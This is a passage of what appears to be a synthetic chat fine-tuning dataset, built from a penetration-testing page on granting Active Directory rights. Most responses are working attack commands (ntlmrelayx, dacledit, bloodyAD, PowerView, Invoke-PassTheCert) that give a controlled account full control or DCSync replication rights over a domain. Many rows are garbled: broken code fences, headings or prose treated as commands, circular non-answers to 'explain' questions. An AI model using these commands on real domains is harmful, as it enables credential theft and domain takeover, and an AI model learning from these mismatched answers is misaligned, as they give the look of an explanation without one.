and arguments. Format multi-step operations as numbered steps.", "user": "Show me the For command for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all)", "response": "For a DCSync granting attack, instead of using dacledit, [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) has the ability to operate that abuse with the `--escalate-user` option (see [this](https://medium.com/@arkanoidctf/hackthebox-writeup-forest-4db0de793f96)).\n\nTo enable inheritance, the `-inheritance` switch can be added to the command. Then it is possible to find interesting targets with `AdminCount=0`in BloodHound for example, by looking at the object attributs.", "metadata": {"corpus_index": 415, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "For"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?"}, {"role": "assistant", "content": "For a DCSync granting attack, instead of using dacledit, [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) has the ability to operate that abuse with the `--escalate-user` option (see [this](https://medium.com/@arkanoidctf/hackthebox-writeup-forest-4db0de793f96)).\n\nTo enable inheritance, the `-inheritance` switch can be added to the command. Then it is possible to find interesting targets with `AdminCount=0`in BloodHound for example, by looking at the object attributs."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?", "response": "For a DCSync granting attack, instead of using dacledit, [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) has the ability to operate that abuse with the `--escalate-user` option (see [this](https://medium.com/@arkanoidctf/hackthebox-writeup-forest-4db0de793f96)).\n\nTo enable inheritance, the `-inheritance` switch can be added to the command. Then it is possible to find interesting targets with `AdminCount=0`in BloodHound for example, by looking at the object attributs.", "metadata": {"corpus_index": 415, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Give full control on the Users container with inheritance to the child object work?"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=Users,DC=domain,DC=local' -inheritance \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Give full control on the Users container with inheritance to the child object work?", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=Users,DC=domain,DC=local' -inheritance \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash", "metadata": {"corpus_index": 416, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Give full control on the Users container with inheritance to the child object"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=Users,DC=domain,DC=local' -inheritance \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Give full control on the Users container with inheritance to the child object", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=Users,DC=domain,DC=local' -inheritance \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nAlternatively, it can be achieved using bloodyAD\n\n``bash", "metadata": {"corpus_index": 416, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Give full control (with inheritance to the child object if applicable)"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add genericAll \"$TargetObject\" \"$ControlledPrincipal\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Give full control (with inheritance to the child object if applicable)", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add genericAll \"$TargetObject\" \"$ControlledPrincipal\"", "metadata": {"corpus_index": 417, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Give full control (with inheritance to the child object if applicable)?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add genericAll \"$TargetObject\" \"$ControlledPrincipal\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Give full control (with inheritance to the child object if applicable)?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add genericAll \"$TargetObject\" \"$ControlledPrincipal\"", "metadata": {"corpus_index": 417, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add dcsync \"$ControlledPrincipal\"\n``\n\n=== Windows\n\nFrom a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add dcsync \"$ControlledPrincipal\"\n``\n\n=== Windows\n\nFrom a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).\n\n``bash", "metadata": {"corpus_index": 418, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add dcsync \"$ControlledPrincipal\"\n``\n\n=== Windows\n\nFrom a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" add dcsync \"$ControlledPrincipal\"\n``\n\n=== Windows\n\nFrom a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).\n\n``bash", "metadata": {"corpus_index": 418, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?"}, {"role": "assistant", "content": "=== Windows\n\nFrom a Windows system, this can be achieved with [Add-DomainObjectAcl](https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainObjectAcl/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?", "response": "=== Windows\n\nFrom a Windows system, this can be achieved with [Add-DomainObjectAcl](https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainObjectAcl/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module).", "metadata": {"corpus_index": 419, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all). Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all). Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "metadata": {"corpus_index": 419, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Give full control?"}, {"role": "assistant", "content": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Give full control?", "response": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"", "metadata": {"corpus_index": 420, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Give full control"}, {"role": "assistant", "content": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Give full control", "response": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"", "metadata": {"corpus_index": 420, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}, {"role": "assistant", "content": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"\n``\n\nAlternatively, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n> Also, its DeepDiveIntoACEsAndSDDLs can be consulted for in-depth details and granular exploitations (ACEs, SDDLs).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "response": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"\n``\n\nAlternatively, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n> Also, its DeepDiveIntoACEsAndSDDLs can be consulted for in-depth details and granular exploitations (ACEs, SDDLs).\n``powershell", "metadata": {"corpus_index": 421, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All) during a pentest?"}, {"role": "assistant", "content": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"\n``\n\nAlternatively, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n> Also, its DeepDiveIntoACEsAndSDDLs can be consulted for in-depth details and granular exploitations (ACEs, SDDLs).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All) during a pentest?", "response": "Add-DomainObjectAcl -Rights 'All' -TargetIdentity \"target_object\" -PrincipalIdentity \"controlled_object\"\n``\n\nAlternatively, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n> Also, its DeepDiveIntoACEsAndSDDLs can be consulted for in-depth details and granular exploitations (ACEs, SDDLs).\n``powershell", "metadata": {"corpus_index": 421, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}, {"role": "assistant", "content": "Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).\n> Also, its [DeepDiveIntoACEsAndSDDLs](https://github.com/jamarir/Invoke-PassTheCert/tree/main/utils/DeepDiveIntoACEsAndSDDLs) can be consulted for in-depth details and granular exploitations (ACEs, SDDLs)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "response": "Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).\n> Also, its [DeepDiveIntoACEsAndSDDLs](https://github.com/jamarir/Invoke-PassTheCert/tree/main/utils/DeepDiveIntoACEsAndSDDLs) can be consulted for in-depth details and granular exploitations (ACEs, SDDLs).", "metadata": {"corpus_index": 422, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?"}, {"role": "assistant", "content": "This command is used for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all). Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?", "response": "This command is used for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all). Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "metadata": {"corpus_index": 422, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Grant Full Control permissions to 'Zack ZS. STRIFE' against 'ESARVI01$'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Zack ZS. STRIFE,CN=Users,DC=X' -Target 'CN=ESARVI01,CN=Computers,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'GenericAll'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Grant Full Control permissions to 'Zack ZS. STRIFE' against 'ESARVI01$'?", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Zack ZS. STRIFE,CN=Users,DC=X' -Target 'CN=ESARVI01,CN=Computers,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'GenericAll'", "metadata": {"corpus_index": 423, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Grant Full Control permissions to 'Zack ZS. STRIFE' against 'ESARVI01$'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Zack ZS. STRIFE,CN=Users,DC=X' -Target 'CN=ESARVI01,CN=Computers,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'GenericAll'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Grant Full Control permissions to 'Zack ZS. STRIFE' against 'ESARVI01$'?", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Zack ZS. STRIFE,CN=Users,DC=X' -Target 'CN=ESARVI01,CN=Computers,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'GenericAll'", "metadata": {"corpus_index": 423, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Grant DCSync (method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes-All' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Grant DCSync (method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' work?", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes-All' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 424, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Grant DCSync (method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes-All' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Grant DCSync (method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightName 'DS-Replication-Get-Changes-All' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 424, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Grant DCSync (method 2, using GUIDs instead, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' in the context of penetration testing"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Grant DCSync (method 2, using GUIDs instead, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' in the context of penetration testing", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 425, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Grant DCSync (method 2, using GUIDs instead, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' during a pentest?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' 